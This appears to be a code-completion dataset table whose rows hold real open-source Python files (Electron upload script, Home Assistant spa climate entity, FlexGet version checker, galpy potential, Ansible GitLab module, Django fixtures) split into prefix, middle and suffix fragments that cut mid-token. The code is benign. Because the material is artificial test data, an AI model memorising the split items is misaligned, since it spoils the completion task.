| repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 6-947k) | score (float64 0-0.34) | prefix (stringlengths 0-8.16k) | middle (stringlengths 3-512) | suffix (stringlengths 0-8.17k) |
|---|---|---|---|---|---|---|---|---|
TrivialBox/HackatonUPS2016
|
helpfriends/login/urls.py
|
Python
|
mit
| 114
| 0.008772
|
from django.conf.urls import
|
url
from . import views
urlpatterns = [
url(r'^$', views.login, name='lo
|
gin'),
]
|
rreimann/electron
|
script/upload.py
|
Python
|
mit
| 8,894
| 0.011806
|
#!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR,
|
ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Uploa
|
d PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
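# Illustrative invocations (an assumption, not taken from the repo docs) implied by
# the flags defined above:
#   python script/upload.py -v v1.6.2       # create the dist if needed and upload assets
#   python script/upload.py -v v1.6.2 -p    # only publish the existing release draft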
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
if get_target_arch() == 'arm' or os.environ.has_key('CI'):
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
t = tempfile.NamedTemporaryFile(suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1}'.format(PROJECT_NAME, tag)
if os.environ.has_key('CI'):
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
if os.environ.has_key('CI'):
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read()
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803
| 0.001206
|
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the spa climate device."""
async_add_entities(
[
BalboaSpaClimate(
entry,
hass.data[DOMAIN][entry.entry_id],
CLIMATE,
)
],
)
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
"""Representation of a Balboa Spa Climate device."""
_attr_icon = "mdi:hot-tub"
_attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
_attr_hvac_modes = CLIMATE_SUPPORTED_MODES
def __init__(self, entry, client, devtype, num=None):
"""Initialize the climate entity."""
super().__init__(entry, client, devtype, num)
self._balboa_to_ha_blower_map = {
self._client.BLOWER_OFF: FAN_OFF,
self._client.BLOWER_LOW: FAN_LOW,
self._client.BLOWER_MEDIUM: FAN_MEDIUM,
self._client.BLOWER_HIGH: FAN_HIGH,
}
self._ha_to_balboa_blower_map = {
value: key for key, value in self._balboa_to_ha_blower_map.items()
}
self._balboa_to_ha_heatmode_map = {
self._client.HEATMODE_READY: HVAC_MODE_HEAT,
self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
self._client.HEATMODE_REST: HVAC_MODE_OFF,
}
self._ha_heatmode_to_balboa_map = {
value: key for key, value in self._balboa_to_ha_heatmode_map.items()
}
scale = self._client.get_tempscale()
self._attr_preset_modes = self._client.get_heatmode_stringlist()
self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
if self._client.have_blower():
self._attr_supported_features |= SUPPORT_FAN_MODE
self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
self._attr_temperature_unit = TEMP_FAHRENHEIT
self._attr_precision = PRECISION_WHOLE
if self._client.get_tempscale() == self._client.TSCALE_C:
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_precision = PRECISION_HALVES
@property
def hvac_mode(self) -> str:
"""Return the current HVAC mode."""
mode = self._client.get_heatmode()
return self._balboa_to_ha_heatmode_map[mode]
@property
def hvac_action(self) -> str:
"""Return the current operation mode."""
state = self._client.get_heatstate()
if state >= self._client.ON:
return CURRENT_HVAC_HEAT
return CURRENT_HVAC_IDLE
@property
def fan_mode(self) -> str:
"""Return the current fan mode."""
fanmode = self._client.get_blower()
return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._client.get_curtemp()
@property
def target_temperature(self):
"""Return the target temperature we try to reach."""
return self._client.get_settemp()
@property
def preset_mode(self):
"""Return current preset mode."""
return self._client.get_heatmode(True)
async def async_set_temperature(self, **kwargs):
"""Set a new target temperature."""
scale = self._client.get_tempscale()
newtemp = kwargs[ATTR_TEMPERATURE]
if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
await asyncio.sleep(SET_TEMPERATURE_WAI
|
T)
if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_LOW)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
await self._client.send_temp_change(newtemp)
async def async_set_preset_mode(self, preset_mode) -> None:
"""Set new preset mode."""
modelist = self._client.get_heatmode_stringlist()
self._async_va
|
lidate_mode_or_raise(preset_mode)
if preset_mode not in modelist:
raise ValueError(f"{preset_mode} is not a valid preset mode")
await self._client.change_heatmode(modelist.index(preset_mode))
async def async_set_fan_mode(self, fan_mode):
"""Set new fan mode."""
await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
def _async_validate_mode_or_raise(self, mode):
"""Check that the mode can be set."""
if mode == self._client.HEATMODE_RNR:
raise ValueError(f"{mode} can only be reported but not set")
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target hvac mode.
OFF = Rest
AUTO = Ready in Rest (can't be set, only reported)
HEAT = Ready
"""
mode = self._ha_heatmode_to_balboa_map[hvac_mode]
self._async_validate_mode_or_raise(mode)
await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
tobinjt/Flexget
|
flexget/plugins/operate/version_checker.py
|
Python
|
mit
| 3,855
| 0.001556
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
import logging
from datetime import datetime
from sqlalchemy import Column, DateTime
from flexget import db_schema, plugin
from flexget.event import event
from flexget.manager import Session
from flexget.utils.tools import get_latest_flexget_version_number, get_current_flexget_version
log = logging.getLogger('version_checker')
Base = db_schema.versioned_base('version_checker', 0)
class LastVersionCheck(Base):
__tablename__ = 'last_version_check'
last_check_time = Column(DateTime, primary_key=True)
def __init__(self):
self.update()
def update(self):
self.last_check_time = datetim
|
e.now()
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'string', 'enum': ['always', 'by_interval']},
{
'type': 'object',
'properties': {
'lookup': {'type': 'string', 'enum': ['always', 'by_interval']},
'check_for_dev_version': {'type': 'boolean'},
'interval': {'type': 'integer'}
|
,
},
'additionalProperties': False,
},
]
}
class VersionChecker(object):
"""
A plugin that checks whether the user is running the latest FlexGet version and logs a warning if not.
Checks via an interval to avoid hammering; the default is 1 day.
Can accept a boolean or one of ['always', 'by_interval'] in config.
Can also accept an object. If the check_for_dev_version option is True, the version will be checked even if the
current release is a dev release; otherwise the check is skipped.
"""
def prepare_config(self, config):
if isinstance(config, bool) and config is True:
config = {'lookup': 'by_interval'}
elif isinstance(config, basestring):
config = {'lookup': config}
config.setdefault('lookup', 'by_interval')
config.setdefault('interval', 1)
config.setdefault('check_for_dev_version', False)
return config
def on_task_start(self, task, config):
if not config:
return
config = self.prepare_config(config)
current_version = get_current_flexget_version()
if config.get('check_for_dev_version') is False and current_version.endswith('dev'):
log.debug('dev version detected, skipping check')
return
always_check = bool(config.get('lookup') == 'always')
interval = config.get('interval')
session = Session()
last_check = session.query(LastVersionCheck).first()
if not always_check:
if last_check:
time_dif = datetime.now() - last_check.last_check_time
should_poll = time_dif.days > interval
else:
should_poll = True
if not should_poll:
log.debug('version check interval not met, skipping check')
return
latest_version = get_latest_flexget_version_number()
if not latest_version:
log.warning('Could not get latest version of flexget')
return
elif latest_version != current_version:
log.warning(
'You are not running latest Flexget Version. Current is %s and latest is %s',
current_version,
latest_version,
)
if last_check:
log.debug('updating last check time')
last_check.update()
else:
last_check = LastVersionCheck()
log.debug('creating instance of last version check in DB')
session.add(last_check)
@event('plugin.register')
def register_plugin():
plugin.register(VersionChecker, 'version_checker', api_ver=2)
|
EventTeam/beliefs
|
test_oop/__init__.py
|
Python
|
gpl-2.0
| 171
| 0.005848
|
from test_oop import *
from beliefs.referent import *
i
|
mport sys
TaxonomyCell.initialize(sys.modules[__name__])
m = MusicalThing()
print m
t = TaxonomyC
|
ell()
t.to_dot()
|
JonTheBurger/python_class
|
chapter 3/lessons/default_arguments.py
|
Python
|
mit
| 383
| 0.007833
|
# Lesson 3
# If arguments n3 or later aren't provided by the caller, they'll use a default value instead
def add(n1, n2, n3=0, n4=0, n5=0, n6=0):
|
# (We'll learn a better way to do something like this later)
return n1 + n2 + n3 + n4 + n5 + n6
print(add(1, 2, 3, 4))
|
# We can explicitly fulfil arguments out of order by using "named parameters"
print(add(n2=1, n1=4, n6=3))
|
followthesheep/galpy
|
galpy/potential_src/PowerSphericalPotentialwCutoff.py
|
Python
|
bsd-3-clause
| 6,813
| 0.011449
|
###############################################################################
# PowerSphericalPotentialwCutoff.py: spherical power-law potential w/ cutoff
#
# amp
# rho(r)= --------- e^{-(r/rc)^2}
# r^\alpha
###############################################################################
import numpy as nu
from scipy import special, integrate
from galpy.potential_src.Potential import Potential, kms_to_kpcGyrDecorator
class PowerSphericalPotentialwCutoff(Potential):
"""Class that implements spherical potentials that are derived from
power-law density models
.. math::
\\rho(r) = \\frac{\\mathrm{amp}}{r^\\alpha}\\,\\exp\\left(-(r/rc)^2\\right)
"""
def __init__(self,amp=1.,alpha=1.,rc=1.,normalize=False):
"""
NAME:
__init__
PURPOSE:
initialize a power-law-density potential
INPUT:
amp= amplitude to be applied to the potential (default: 1)
alpha= inner power
rc= cut-off radius
normalize= if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
OUTPUT:
(none)
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
Potential.__init__(self,amp=amp)
self.alpha= alpha
self.rc= rc
self._scale= self.rc
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
self.hasC= True
self.hasC_dxdv= True
self._nemo_accname= 'PowSphwCut'
def _evaluate(self,R,z,phi=0.,t=0.):
"""
NAME:
_evaluate
PURPOSE:
evaluate the potential at R,z
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
Phi(R,z)
HISTORY:
2013-06-28 - Started - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)/r*(r/self.rc*special.gamma(1.-self.alpha/2.)*special.gammainc(1.-self.alpha/2.,(r/self.rc)**2.)-special.gamma(1.5-self.alpha/2.)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.))
def _Rforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rforce
PURPOSE:
evaluate the radial force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the
|
radial force
HISTORY:
|
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*R/r**3.
def _zforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_zforce
PURPOSE:
evaluate the vertical force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the vertical force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*z/r**3.
def _R2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rderiv
PURPOSE:
evaluate the second radial derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the second radial derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*R**2.\
+self._mass(r)/r**5.*(z**2.-2.*R**2.)
def _z2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_z2deriv
PURPOSE:
evaluate the second vertical derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
the second vertical derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*z**2.\
+self._mass(r)/r**5.*(R**2.-2.*z**2.)
def _Rzderiv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rzderiv
PURPOSE:
evaluate the mixed R,z derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
d2phi/dR/dz
HISTORY:
2013-08-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return R*z*(4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)
-3.*self._mass(r)/r**5.)
def _dens(self,R,z,phi=0.,t=0.):
"""
NAME:
_dens
PURPOSE:
evaluate the density force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the density
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 1./r**self.alpha*nu.exp(-(r/self.rc)**2.)
def _mass(self,R,z=0.,t=0.):
"""
NAME:
_mass
PURPOSE:
evaluate the mass within R for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
t - time
OUTPUT:
the mass enclosed
HISTORY:
2013-XX-XX - Written - Bovy (IAS)
"""
if z is None: r= R
else: r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.)*special.gamma(1.5-self.alpha/2.)
@kms_to_kpcGyrDecorator
def _nemo_accpars(self,vo,ro):
"""
NAME:
_nemo_accpars
PURPOSE:
return the accpars potential parameters for use of this potential with NEMO
INPUT:
vo - velocity unit in km/s
ro - length unit in kpc
OUTPUT:
accpars string
HISTORY:
2014-12-18 - Written - Bovy (IAS)
"""
ampl= self._amp*vo**2.*ro**(self.alpha-2.)
return "0,%s,%s,%s" % (ampl,self.alpha,self.rc*ro)
|
wearehoods/django-model-publisher-ai
|
publisher_test_project/fixtures.py
|
Python
|
bsd-3-clause
| 6,789
| 0.003535
|
import logging
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from cms.models import Page, PagePermission
from django_cms_tools.fixtures.pages import CmsPageCreator
# https://github.com/jedie/django-tools
from django_tools.permissions import get_filtered_permissions, pformat_permission
from django_tools.unittest_utils.user import get_or_create_user_and_group
from publisher import constants
from publisher.models import PublisherStateModel
from publisher_test_project.constants import EDITOR_GROUP, EDITOR_USER, REPORTER_GROUP, REPORTER_USER
from publisher_test_project.publisher_list_app.fixtures import list_item_fixtures
from publisher_test_project.publisher_list_app.models import PublisherItem
from publisher_test_project.publisher_test_app.models import (PublisherParlerAutoSlugifyTestModel,
PublisherParlerTestModel, PublisherTestModel)
log = logging.getLogger(__name__)
def get_permission(model, codename):
content_type = ContentType.objects.get_for_model(model)
permission = Permission.objects.get(content_type=content_type, codename=codename)
return permission
class TestPageCreator(CmsPageCreator):
placeholder_slots = ("content",)
dummy_text_count = 1
def __init__(self, no, *args, **kwargs):
self.no = no
super(TestPageCreator, self).__init__(*args, **kwargs)
def get_title(self, language_code, lang_name):
return "Test page %i in %s" % (self.no, lang_name)
def get_slug(self, language_code, lang_name):
slug = super(TestPageCreator, self).get_slug(language_code, lang_name)
log.debug("slug: %r (%r %s)", slug, language_code, lang_name)
return slug
def get_add_plugin_kwargs(self, page, no, placeholder, language_code, lang_name):
"""
Return "content" for create the plugin.
Called from self.add_plugins()
"""
return {
"plugin_type": "PlainTextPlugin", # publisher_test_app.cms_plugins.PlainTextPlugin
"text": "Dummy plain text plugin no.%i" % self.no
}
def create_test_user(delete_first=False):
User=get_user_model()
if delete_first:
qs = User.objects.exclude(is_superuser=True, is_active=True)
prin
|
t("Delete %i users..." % qs.count())
qs.delete()
qs = Group.objects.all()
print("Delete %i user groups..." % qs.count())
qs.delete()
# all_permissions = [
# "%s.%s" % (entry.content_type, entry.codename)
# for entry in Permission.objects.all().order_by("content_type", "codename")
# ]
# pprint.pprint(all_permissions)
superuser_qs = User.objects.all().filter(is_superuse
|
r=True, is_active=True)
try:
superuser = superuser_qs[0]
except IndexError:
print("\nERROR: No active superuser found!")
print("Please create one and run again!\n")
sys.exit(-1)
print("Use password from Superuser:", superuser)
encrypted_password = superuser.password
# 'reporter' user can create (un-)publish requests:
reporter_user = get_or_create_user_and_group(
username=REPORTER_USER,
groupname=REPORTER_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(
"can_publish" # <app_name>.can_publish_<model_name>
"delete" # <app_name>.delete_<model_name>
),
exclude_permissions=(
# Django CMS permissions:
(Page, "publish_page"), # cms.publish_page
(Page, "delete_page"), # cms.delete_page
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
(PublisherParlerAutoSlugifyTestModel, "can_publish_publisherparlerautoslugifytestmodel"),
(PublisherParlerAutoSlugifyTestModel, "delete_publisherparlerautoslugifytestmodel"),
(PublisherItem, "can_publish_publisheritem"),
(PublisherItem, "delete_publisheritem"),
(PublisherParlerTestModel, "can_publish_publisherparlertestmodel"),
(PublisherParlerTestModel, "delete_publisherparlertestmodel"),
(PublisherTestModel, "can_publish_publishertestmodel"),
(PublisherTestModel, "delete_publishertestmodel"),
),
),
encrypted_password=encrypted_password
)
# 'editor' can direct (un-)publish & accept/reject a (un-)publish request
editor_user = get_or_create_user_and_group(
username=EDITOR_USER,
groupname=EDITOR_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(),
exclude_permissions=(
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
),
),
encrypted_password=encrypted_password
)
return reporter_user, editor_user
def create_test_page(delete_first=False):
for no in range(1,5):
page, created = TestPageCreator(no=no, delete_first=delete_first).create()
if created:
print("Test page created: '%s'" % page)
else:
print("Test page already exists: '%s'" % page)
def create_test_model_entries(delete_first=False):
if delete_first:
qs = PublisherTestModel.objects.all()
print("Delete %i test model entries..." % qs.count())
qs.delete()
for no in range(1,5):
instance, created = PublisherTestModel.objects.get_or_create(
no = no,
title="Test entry %i" % no,
publisher_is_draft=True
)
if created:
print("Test model entry: '%s'" % instance)
else:
print("Test model entry already exists: '%s'" % instance)
instance.publish()
def create_test_data(delete_first=False):
if delete_first:
qs = Page.objects.all()
log.debug("Delete %i CMS pages...", qs.count())
qs.delete()
reporter_user, editor_user = create_test_user(delete_first=delete_first)
create_test_page(delete_first=delete_first)
create_test_model_entries(delete_first=delete_first)
list_item_fixtures()
return reporter_user, editor_user
|
gregdek/ansible
|
lib/ansible/modules/source_control/gitlab_group.py
|
Python
|
gpl-3.0
| 7,470
| 0.002544
|
#!/usr/bin/python
# Copyright: (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gitlab_group
short_description: Creates/updates/deletes Gitlab Groups
description:
- When the group does not exist in Gitlab, it will be created.
- When the group does exist and state=absent, the group will be deleted.
- As of Ansible version 2.7, this module makes use of a different Python module and thus some arguments are deprecated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- python-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- When using https if SSL certificate needs to be verified.
type: bool
default: 'yes'
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
login_password:
description:
- Gitlab password for login_user
login_token:
description:
- Gitlab token for logging in.
name:
description:
- Name of the group you want to create.
required: true
path:
description:
- The path of the group you want to create, this will be server_url/group_path
- If not supplied, the group_name will be used.
description:
description:
- A description for the group.
version_added: "2.7"
state:
description:
- create or delete group.
- Possible values are present and absent.
default: "present"
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab Group"
local_action:
gitlab_group:
server_url: http://gitlab.dj-wasabi.local
validate_certs: False
login_token: WnUzDsxjy8230-Dy_k
name: my_first_group
state: absent
- name: "Create Gitlab Group"
local_action:
gitlab_group:
server_url: https://gitlab.dj-wasabi.local"
validate_certs: True
login_user: dj-wasabi
login_password: "MySecretPassword"
name: my_first_group
path: my_first_group
state: present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class GitLabGroup(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
self.groupObject = None
def createOrUpdateGroup(self, name, path, description):
changed = False
if self.groupObject is None:
group = self._gitlab.groups.create({'name': name, 'path': path})
changed = True
else:
group = self.groupObject
if description is not None:
if group.description != description:
group.description = description
changed = True
if changed:
if self._module.check_mode:
self._module.exit_json(changed=True, result="Group should have updated.")
try:
group.save()
except Exception as e:
self._module.fail_json(msg="Failed to create or update a group: %s " % e)
return True
else:
return False
def deleteGroup(self):
group = self.groupObject
if len(group.projects.list()) >= 1:
self._module.fail_json(
msg="There are still projects in this group. These needs to be moved or deleted b
|
efore this group can be removed.")
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
try:
group.delete()
except Exception as e:
|
self._module.fail_json(msg="Failed to delete a group: %s " % e)
return True
def existsGroup(self, name):
"""When group/user exists, object will be stored in self.groupObject."""
groups = self._gitlab.groups.list(search=name)
if len(groups) == 1:
self.groupObject = groups[0]
return True
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True, type='str'),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True, type='str'),
login_password=dict(required=False, no_log=True, type='str'),
login_token=dict(required=False, no_log=True, type='str'),
name=dict(required=True, type='str'),
path=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(default="present", choices=["present", "absent"]),
),
mutually_exclusive=[
['login_user', 'login_token'],
['login_password', 'login_token']
],
required_together=[
['login_user', 'login_password']
],
required_one_of=[
['login_user', 'login_token']
],
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install python-gitlab")
server_url = module.params['server_url']
